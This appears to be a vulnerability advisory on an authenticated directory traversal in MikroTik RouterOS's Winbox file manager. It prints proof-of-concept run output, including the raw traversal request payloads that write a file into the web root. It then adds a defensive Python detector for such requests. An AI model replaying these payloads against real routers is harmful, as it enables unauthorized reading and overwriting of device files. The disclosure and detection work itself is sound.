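Tenable discovered a vulnerability while analyzing MikroTik RouterOS 6.42.12. The vulnerability is an authenticated remote directory traversal that gives mkdir, read, and write access to files outside the sandbox path /rw/disk. An attacker can read the entire filesystem and has write access to every location not marked read-only.
The vulnerability is very similar to CVE-2018-14847. The main differences are that the new vulnerability exists in the file manager binary (SYS_TO number: 72) and requires authentication to invoke. The traversal logic is unchanged, and it is reachable over HTTP or Winbox (8291).
The following output is taken from a proof of concept that creates a simple web page that just says hello.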
[email protected]:~/routeros/poc/cve_2019_3943/build$ curl http://192.168.1.15/webfig/lol.txt
错误404: 未找到错误404: 未找到
[email protected]:~/routeros/poc/cve_2019_3943/build$ ./cve_2019_3943_poc -i 192.168.1.15 -p 8291
req: {bff0005:1,uff0006:1,uff0007:6,s1:'//./.././.././../pckg/lol',Uff0001:[72,1]}
resp: {uff0003:2,uff0006:1,Uff0001:[],Uff0002:[72,1]}
req: {bff0005:1,uff0006:2,uff0007:6,s1:'//./.././.././../pckg/lol/home',Uff0001:[72,1]}
resp: {uff0003:2,uff0006:2,Uff0001:[],Uff0002:[72,1]}
req: {bff0005:1,uff0006:3,uff0007:6,s1:'//./.././.././../pckg/lol/home/web/',Uff0001:[72,1]}
resp: {uff0003:2,uff0006:3,Uff0001:[],Uff0002:[72,1]}
req: {bff0005:1,uff0006:4,uff0007:6,s1:'//./.././.././../pckg/lol/home/web/webfig',Uff0001:[72,1]}
resp: {uff0003:2,uff0006:4,Uff0001:[],Uff0002:[72,1]}
req: {bff0005:1,uff0006:5,uff0007:1,s1:'//./.././.././../pckg/lol/home/web/webfig/lol.txt',Uff0001:[72,1]}
resp: {ufe0001:1,uff0003:2,uff0006:5,Uff0001:[],Uff0002:[72,1]}
req: {bff0005:1,ufe0001:1,uff0006:6,uff0007:2,r5:[104,101,108,108,111,33,10],Uff0001:[72,1]}
resp: {uff0003:2,uff0006:6,Uff0001:[],Uff0002:[72,1]}
[email protected]:~/routeros/poc/cve_2019_3943/build$ curl http://192.168.1.15/webfig/lol.txt
hello!
[email protected]:~/routeros/poc/cve_2019_3943/build$
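
For defenders reviewing decoded Winbox traffic, the following added example (not part of the original advisory or its proof of concept) parses request lines in the notation printed above and flags file requests whose s1 path resolves outside /rw/disk. It assumes the path is joined lexically to the sandbox root; the function names and the third sample line are constructed for illustration.

```python
import posixpath
import re

SANDBOX = "/rw/disk"     # sandbox path named in the advisory text
FILE_HANDLER = [72, 1]   # Uff0001 value carried by every request in the output

# Constructed sample: two requests copied from the output above, one benign line made up here.
SAMPLE = [
    "req: {bff0005:1,uff0006:1,uff0007:6,s1:'//./.././.././../pckg/lol',Uff0001:[72,1]}",
    "req: {bff0005:1,uff0006:5,uff0007:1,"
    "s1:'//./.././.././../pckg/lol/home/web/webfig/lol.txt',Uff0001:[72,1]}",
    "req: {bff0005:1,uff0006:9,uff0007:6,s1:'/backups/./2019',Uff0001:[72,1]}",
]

# key:value pairs where the value is a quoted string, a bracketed array, or a bare number
FIELD = re.compile(r"(\w+):('[^']*'|\[[^\]]*\]|[^,}]+)")

def parse_message(line):
    """Turn 'req: {k:v,...}' into a dict (strings unquoted, arrays as int lists)."""
    body = line[line.index("{") + 1 : line.rindex("}")]
    msg = {}
    for key, raw in FIELD.findall(body):
        if raw.startswith("'"):
            msg[key] = raw[1:-1]
        elif raw.startswith("["):
            msg[key] = [int(x) for x in raw[1:-1].split(",") if x]
        else:
            msg[key] = int(raw)
    return msg

def resolve(path, root=SANDBOX):
    """Canonical path reached when the request path is appended to the sandbox root (assumption)."""
    return posixpath.normpath(root + "/" + path)

def escapes_sandbox(path, root=SANDBOX):
    resolved = resolve(path, root)
    return not (resolved == root or resolved.startswith(root + "/"))

def flag_traversals(lines):
    """Return (request id, raw path, resolved path) for each file request leaving the sandbox."""
    hits = []
    for line in lines:
        msg = parse_message(line)
        path = msg.get("s1")
        if msg.get("Uff0001") == FILE_HANDLER and isinstance(path, str) and escapes_sandbox(path):
            hits.append((msg["uff0006"], path, resolve(path)))
    return hits
```

The same canonicalize-then-compare check is what a fixed handler needs to apply before touching the filesystem; matching on the literal string `..` alone would miss equivalent encodings and flag harmless paths.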